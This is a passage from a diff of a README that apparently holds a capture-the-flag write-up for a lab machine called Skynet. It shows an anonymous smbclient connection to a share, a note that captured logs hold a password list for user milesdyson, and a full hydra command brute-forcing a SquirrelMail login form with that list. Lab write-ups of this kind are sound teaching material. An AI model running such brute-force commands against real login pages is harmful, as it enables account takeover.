gkhns/skynet/README.md

   smbclient '\\10.10.48.162\anonymous'
   ```

- We captures a number of logs files, one of which includes a password list potentiall for **milesdyson**.
+ We captured a number of log files -- one of which includes a password list for **milesdyson**.
 Let's use **hydra** for brute-forcing the email account

  ```sh
  hydra -l milesdyson -P log1.txt 10.10.48.162 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect" -V -F -u